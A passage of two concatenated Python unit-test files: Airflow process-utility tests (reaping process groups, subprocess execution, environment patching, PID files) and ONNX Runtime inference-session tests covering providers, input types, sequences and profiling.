from airflow.utils.process_utils import check_if_pidfile_process_is_running, execute_in_subprocess, log
class TestReapProcessGroup(unittest.TestCase):
@staticmethod
def _ignores_sigterm(child_pid, child_setup_done):
def signal_handler(unused_signum, unused_frame):
pass
signal.signal(signal.SIGTERM, signal_handler)
child_pid.value = os.getpid()
child_setup_done.release()
while True:
time.sleep(1)
@staticmethod
def _parent_of_ignores_sigterm(parent_pid, child_pid, setup_done):
def signal_handler(unused_signum, unused_frame):
pass
os.setsid()
signal.signal(signal.SIGTERM, signal_handler)
child_setup_done = multiprocessing.Semaphore(0)
child = multiprocessing.Process(target=TestReapProcessGroup._ignores_sigterm,
args=[child_pid, child_setup_done])
child.start()
child_setup_done.acquire(timeout=5.0)
parent_pid.value = os.getpid()
setup_done.release()
while True:
time.sleep(1)
def test_reap_process_group(self):
"""
Spin up a process that can't be killed by SIGTERM and make sure
it gets killed anyway.
"""
parent_setup_done = multiprocessing.Semaphore(0)
parent_pid = multiprocessing.Value('i', 0)
child_pid = multiprocessing.Value('i', 0)
args = [parent_pid, child_pid, parent_setup_done]
parent = multiprocessing.Process(target=TestReapProcessGroup._parent_of_ignores_sigterm, args=args)
try:
parent.start()
self.assertTrue(parent_setup_done.acquire(timeout=5.0))
self.assertTrue(psutil.pid_exists(parent_pid.value))
self.assertTrue(psutil.pid_exists(child_pid.value))
process_utils.reap_process_group(parent_pid.value, logging.getLogger(), timeout=1)
self.assertFalse(psutil.pid_exists(parent_pid.value))
self.assertFalse(psutil.pid_exists(child_pid.value))
finally:
try:
os.kill(parent_pid.value, signal.SIGKILL) # terminate doesnt work here
os.kill(child_pid.value, signal.SIGKILL) # terminate doesnt work here
except OSError:
pass
class TestExecuteInSubProcess(unittest.TestCase):
def test_should_print_all_messages1(self):
with self.assertLogs(log) as logs:
execute_in_subprocess(["bash", "-c", "echo CAT; echo KITTY;"])
msgs = [record.getMessage() for record in logs.records]
self.assertEqual([
"Executing cmd: bash -c 'echo CAT; echo KITTY;'",
'Output:',
'CAT',
'KITTY'
], msgs)
def test_should_raise_exception(self):
with self.assertRaises(CalledProcessError):
process_utils.execute_in_subprocess(["bash", "-c", "exit 1"])
def my_sleep_subprocess():
sleep(100)
def my_sleep_subprocess_with_signals():
signal.signal(signal.SIGINT, lambda signum, frame: None)
signal.signal(signal.SIGTERM, lambda signum, frame: None)
sleep(100)
@pytest.mark.quarantined
class TestKillChildProcessesByPids(unittest.TestCase):
def test_should_kill_process(self):
before_num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
process = multiprocessing.Process(target=my_sleep_subprocess, args=())
process.start()
sleep(0)
num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
self.assertEqual(before_num_process + 1, num_process)
process_utils.kill_child_processes_by_pids([process.pid])
num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
self.assertEqual(before_num_process, num_process)
def test_should_force_kill_process(self):
before_num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
process = multiprocessing.Process(target=my_sleep_subprocess_with_signals, args=())
process.start()
sleep(0)
num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
self.assertEqual(before_num_process + 1, num_process)
with self.assertLogs(process_utils.log) as cm:
process_utils.kill_child_processes_by_pids([process.pid], timeout=0)
self.assertTrue(any("Killing child PID" in line for line in cm.output))
num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
self.assertEqual(before_num_process, num_process)
class TestPatchEnviron(unittest.TestCase):
def test_should_update_variable_and_restore_state_when_exit(self):
with mock.patch.dict("os.environ", {"TEST_NOT_EXISTS": "BEFORE", "TEST_EXISTS": "BEFORE"}):
del os.environ["TEST_NOT_EXISTS"]
self.assertEqual("BEFORE", os.environ["TEST_EXISTS"])
self.assertNotIn("TEST_NOT_EXISTS", os.environ)
with process_utils.patch_environ({"TEST_NOT_EXISTS": "AFTER", "TEST_EXISTS": "AFTER"}):
self.assertEqual("AFTER", os.environ["TEST_NOT_EXISTS"])
self.assertEqual("AFTER", os.environ["TEST_EXISTS"])
self.assertEqual("BEFORE", os.environ["TEST_EXISTS"])
self.assertNotIn("TEST_NOT_EXISTS", os.environ)
def test_should_restore_state_when_exception(self):
with mock.patch.dict("os.environ", {"TEST_NOT_EXISTS": "BEFORE", "TEST_EXISTS": "BEFORE"}):
del os.environ["TEST_NOT_EXISTS"]
self.assertEqual("BEFORE", os.environ["TEST_EXISTS"])
self.assertNotIn("TEST_NOT_EXISTS", os.environ)
with suppress(AirflowException):
with process_utils.patch_environ({"TEST_NOT_EXISTS": "AFTER", "TEST_EXISTS": "AFTER"}):
self.assertEqual("AFTER", os.environ["TEST_NOT_EXISTS"])
self.assertEqual("AFTER", os.environ["TEST_EXISTS"])
raise AirflowException("Unknown excepiton")
self.assertEqual("BEFORE", os.environ["TEST_EXISTS"])
self.assertNotIn("TEST_NOT_EXISTS", os.environ)
class TestCheckIfPidfileProcessIsRunning(unittest.TestCase):
def test_ok_if_no_file(self):
check_if_pidfile_process_is_running('some/pid/file', process_name="test")
def test_remove_if_no_process(self):
# Assert file is deleted
with self.assertRaises(FileNotFoundError):
with NamedTemporaryFile('+w') as f:
f.write('19191919191919191991')
f.flush()
check_if_pidfile_process_is_running(f.name, process_name="test")
def test_raise_error_if_process_is_running(self):
pid = os.getpid()
with NamedTemporaryFile('+w') as f:
f.write(str(pid))
f.flush()
with self.assertRaisesRegex(AirflowException, "is already running under PID"):
check_if_pidfile_process_is_running(f.name, process_name="test")
|
onnxruntime_test_python.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import unittest
import os
import numpy as np
import onnxruntime as onnxrt
import threading
import sys
from helper import get_name
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testModelSerialization(self):
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
def testGetProviders(self):
self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue('CPUExecutionProvider' == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testSetProvidersWithOptions(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
import sys
import ctypes
CUDA_SUCCESS = 0
def runBaseTest1():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
option1 = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option1])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
option2 = {'device_id': -1}
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option2])
sess.set_providers(['CUDAExecutionProvider', 'CPUExecutionProvider'], [option1, {}])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
def runBaseTest2():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# test get/set of "cuda_mem_limit" configuration.
options = sess.get_provider_options()
self.assertTrue('CUDAExecutionProvider' in options)
option = options['CUDAExecutionProvider']
self.assertTrue('cuda_mem_limit' in option)
ori_mem_limit = option['cuda_mem_limit']
new_mem_limit = int(ori_mem_limit) // 2
option['cuda_mem_limit'] = new_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['cuda_mem_limit'], str(new_mem_limit))
option['cuda_mem_limit'] = ori_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['cuda_mem_limit'], ori_mem_limit)
# test get/set of "arena_extend_strategy" configuration.
options = sess.get_provider_options()
self.assertTrue('CUDAExecutionProvider' in options)
option = options['CUDAExecutionProvider']
self.assertTrue('arena_extend_strategy' in option)
for strategy in ['kNextPowerOfTwo', 'kSameAsRequested']:
option['arena_extend_strategy'] = strategy
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['arena_extend_strategy'], strategy)
#
# Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
# so run them last. Each set_providers call will attempt to re-create a session, so it's
# fine for a test that fails to run immediately after another one that fails.
# Alternatively a valid call to set_providers could be used to recreate the underlying session
# after a failed call.
#
option['arena_extend_strategy'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = -1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = 1024.1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
def getCudaDeviceCount():
import ctypes
num_device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
result = cuda.cuInit(0)
result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
return -1
return num_device.value
def setDeviceIdTest(i):
import ctypes
import onnxruntime as onnxrt
device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
option = {'device_id': i}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
result = cuda.cuCtxGetDevice(ctypes.byref(device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
self.assertEqual(result, CUDA_SUCCESS)
self.assertEqual(i, device.value)
def runAdvancedTest():
num_device = getCudaDeviceCount()
if num_device < 0:
return
# Configure session to be ready to run on all available cuda devices
for i in range(num_device):
setDeviceIdTest(i)
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# configure session with not legit option values and that shloud fail
with self.assertRaises(RuntimeError):
option = {'device_id': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'device_id': 'non_legit_value'}
sess.set_providers(['CUDAExecutionProvider'], [option])
# configure session with not legit option should cause no effect
option = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'non_legit_option': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
libnames = ('libcuda.so', 'libcuda.dylib', 'cuda.dll')
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
runBaseTest1()
runBaseTest2()
runAdvancedTest()
except OSError:
continue
else:
break
else:
runBaseTest1()
runBaseTest2()
# raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
sess.set_providers(['InvalidProvider'])
self.assertTrue(
'[\'InvalidProvider\'] does not contain a subset of available providers' in str(context.exception))
def testSessionProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2Contiguous(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[2.0, 1.0], [4.0, 3.0], [6.0, 5.0]], dtype=np.float32)[:, [1, 0]]
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
xcontiguous = np.ascontiguousarray(x)
rescontiguous = sess.run([output_name], {input_name: xcontiguous})
np.testing.assert_allclose(output_expected, rescontiguous[0], rtol=1e-05, atol=1e-08)
def testRunModelMultipleThreads(self):
available_providers = onnxrt.get_available_providers()
# Skip this test for a "pure" DML onnxruntime python wheel. We keep this test enabled for instances where both DML and CUDA
# EPs are available (Windows GPU CI pipeline has this config) - this test will pass because CUDA has higher precendence than DML
# and the nodes are assigned to only the CUDA EP (which supports this test)
if ('DmlExecutionProvider' in available_providers and not 'CUDAExecutionProvider' in available_providers):
print("Skipping testRunModelMultipleThreads as the DML EP does not support calling Run() on different threads using the same session object ")
else:
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "MultiThreadsTest"
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
ro1 = onnxrt.RunOptions()
ro1.logid = "thread1"
t1 = threading.Thread(target=self.run_model, args=(sess, ro1))
ro2 = onnxrt.RunOptions()
ro2.logid = "thread2"
t2 = threading.Thread(target=self.run_model, args=(sess, ro2))
t1.start()
t2.start()
t1.join()
t2.join()
def testListAsInput(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
res = sess.run([], {input_name: x.tolist()})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testStringListAsInput(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
res = sess.run([], {x_name: x.tolist()})
np.testing.assert_equal(x, res[0])
def testRunDevice(self):
device = onnxrt.get_device()
self.assertTrue('CPU' in device or 'GPU' in device)
def testRunModelSymbolicInput(self):
sess = onnxrt.InferenceSession(get_name("matmul_2.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
# Input X has an unknown dimension.
self.assertEqual(input_shape, ['None', 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
# Output X has an unknown dimension.
self.assertEqual(output_shape, ['None', 1])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[5.0], [11.0], [17.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testBooleanInputs(self):
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
# input1:0 is first in the protobuf, and input:0 is second
# and we maintain the original order.
a_name = sess.get_inputs()[0].name
self.assertEqual(a_name, "input1:0")
a_shape = sess.get_inputs()[0].shape
self.assertEqual(a_shape, [2, 2])
a_type = sess.get_inputs()[0].type
self.assertEqual(a_type, 'tensor(bool)')
b_name = sess.get_inputs()[1].name
self.assertEqual(b_name, "input:0")
b_shape = sess.get_inputs()[1].shape
self.assertEqual(b_shape, [2, 2])
b_type = sess.get_inputs()[0].type
self.assertEqual(b_type, 'tensor(bool)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(bool)')
output_expected = np.array([[True, False], [False, False]], dtype=np.bool)
res = sess.run([output_name], {a_name: a, b_name: b})
np.testing.assert_equal(output_expected, res[0])
def testStringInput1(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], dtype=np.str).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testStringInput2(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['Olá', '你好', '여보세요', 'hello'], dtype=np.unicode).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputBytes(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test']).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0].astype('|S8'))
def testInputObject(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array(['this', 'is', 'identity', 'test'], object).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
np.testing.assert_equal(x, res[0])
def testInputVoid(self):
sess = onnxrt.InferenceSession(get_name("identity_string.onnx"))
x = np.array([b'this', b'is', b'identity', b'test'], np.void).reshape((2, 2))
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "input:0")
x_shape = sess.get_inputs()[0].shape
self.assertEqual(x_shape, [2, 2])
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'tensor(string)')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output:0")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [2, 2])
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(string)')
res = sess.run([output_name], {x_name: x})
expr = np.array([['this\x00\x00\x00\x00', 'is\x00\x00\x00\x00\x00\x00'], ['identity', 'test\x00\x00\x00\x00']],
dtype=object)
np.testing.assert_equal(expr, res[0])
def testRaiseWrongNumInputs(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"))
a = np.array([[True, True], [False, False]], dtype=np.bool)
res = sess.run([], {'input:0': a})
self.assertTrue('Model requires 2 inputs' in str(context.exception))
def testModelMeta(self):
model_path = "../models/opset8/test_squeezenet/model.onnx"
if not os.path.exists(model_path):
return
sess = onnxrt.InferenceSession(model_path)
modelmeta = sess.get_modelmeta()
self.assertEqual('onnx-caffe2', modelmeta.producer_name)
self.assertEqual('squeezenet_old', modelmeta.graph_name)
self.assertEqual('', modelmeta.domain)
self.assertEqual('', modelmeta.description)
def testProfilerWithSessionOptions(self):
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
sess.run([], {'X': x})
profile_file = sess.end_profiling()
tags = ['pid', 'dur', 'ts', 'ph', 'X', 'name', 'args']
with open(profile_file) as f:
lines = f.readlines()
self.assertTrue('[' in lines[0])
for i in range(1, 8):
for tag in tags:
self.assertTrue(tag in lines[i])
self.assertTrue(']' in lines[8])
def testProfilerGetStartTimeNs(self):
def getSingleSessionProfilingStartTime():
so = onnxrt.SessionOptions()
so.enable_profiling = True
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
return sess.get_profiling_start_time_ns()
# Get 1st profiling's start time
start_time_1 = getSingleSessionProfilingStartTime()
# Get 2nd profiling's start time
start_time_2 = getSingleSessionProfilingStartTime()
# Get 3rd profiling's start time
start_time_3 = getSingleSessionProfilingStartTime()
# Chronological profiling's start time
self.assertTrue(start_time_1 <= start_time_2 <= start_time_3)
def testGraphOptimizationLevel(self):
opt = onnxrt.SessionOptions()
# default should be all optimizations optimization
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL)
opt.graph_optimization_level = onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
self.assertEqual(opt.graph_optimization_level, onnxrt.GraphOptimizationLevel.ORT_ENABLE_EXTENDED)
sess = onnxrt.InferenceSession(get_name("logicaland.onnx"), sess_options=opt)
a = np.array([[True, True], [False, False]], dtype=np.bool)
b = np.array([[True, False], [True, False]], dtype=np.bool)
res = sess.run([], {'input1:0': a, 'input:0': b})
def testSequenceLength(self):
sess = onnxrt.InferenceSession(get_name("sequence_length.onnx"))
x = [
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3)),
np.array([1.0, 0.0, 3.0, 44.0, 23.0, 11.0], dtype=np.float32).reshape((2, 3))
]
x_name = sess.get_inputs()[0].name
self.assertEqual(x_name, "X")
x_type = sess.get_inputs()[0].type
self.assertEqual(x_type, 'seq(tensor(float))')
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'tensor(int64)')
output_expected = np.array(2, dtype=np.int64)
res = sess.run([output_name], {x_name: x})
self.assertEqual(output_expected, res[0])
def testSequenceConstruct(self):
sess = onnxrt.InferenceSession(get_name("sequence_construct.onnx"))
self.assertEqual(sess.get_inputs()[0].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "tensor1")
self.assertEqual(sess.get_inputs()[1].name, "tensor2")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [
np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
]
res = sess.run(
[output_name], {
"tensor1": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"tensor2": np.array([1, 2, 3, 4, 5, 6], dtype=np.int64).reshape((2, 3))
})
np.testing.assert_array_equal(output_expected, res[0])
def testSequenceInsert(self):
opt = onnxrt.SessionOptions()
opt.execution_mode = onnxrt.ExecutionMode.ORT_SEQUENTIAL
sess = onnxrt.InferenceSession(get_name("sequence_insert.onnx"), sess_options=opt)
self.assertEqual(sess.get_inputs()[0].type, 'seq(tensor(int64))')
self.assertEqual(sess.get_inputs()[1].type, 'tensor(int64)')
self.assertEqual(sess.get_inputs()[0].name, "input_seq")
self.assertEqual(sess.get_inputs()[1].name, "tensor")
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "output_sequence")
output_type = sess.get_outputs()[0].type
self.assertEqual(output_type, 'seq(tensor(int64))')
output_expected = [np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3))]
res = sess.run([output_name], {
"tensor": np.array([1, 0, 3, 44, 23, 11], dtype=np.int64).reshape((2, 3)),
"input_seq": []
})
np.testing.assert_array_equal(output_expected, res[0])
def testOrtExecutionMode(self):
opt = onnxrt.SessionOptions()
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_SEQUENTIAL)
opt.execution_mode = onnxrt.ExecutionMode.ORT_PARALLEL
self.assertEqual(opt.execution_mode, onnxrt.ExecutionMode.ORT_PARALLEL)
def testLoadingSessionOptionsFromModel(self):
try:
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(1)
sess = onnxrt.InferenceSession(get_name("model_with_valid_ort_config_json.onnx"))
session_options = sess.get_session_options()
self.assertEqual(session_options.inter_op_num_threads, 5) # from the ORT config
self.assertEqual(session_options.intra_op_num_threads, 2) # from the ORT config
self.assertEqual(session_options.execution_mode,
onnxrt.ExecutionMode.ORT_SEQUENTIAL) # default option (not from the ORT config)
self.assertEqual(session_options.graph_optimization_level,
onnxrt.GraphOptimizationLevel.ORT_ENABLE_ALL) # from the ORT config
self.assertEqual(session_options.enable_profiling, True) # from the ORT config
except Exception:
raise
finally:
# Make sure the usage of the feature is disabled after this test
os.environ['ORT_LOAD_CONFIG_FROM_MODEL'] = str(0)
def testSessionOptionsAddFreeDimensionOverrideByDenotation(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_denotation("DATA_BATCH", 3)
so.add_free_dimension_override_by_denotation("DATA_CHANNEL", 5)
sess = onnxrt.InferenceSession(get_name("abs_free_dimensions.onnx"), so)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "x")
input_shape = sess.get_inputs()[0].shape
# Free dims with denotations - "DATA_BATCH" and "DATA_CHANNEL" have values assigned to them.
self.assertEqual(input_shape, [3, 5, 5])
def testSessionOptionsAddFreeDimensionOverrideByName(self):
so = onnxrt.SessionOptions()
so.add_free_dimension_override_by_name("Dim1", 4)
so.add_free_dimension_override_by_name("Dim2", 6)
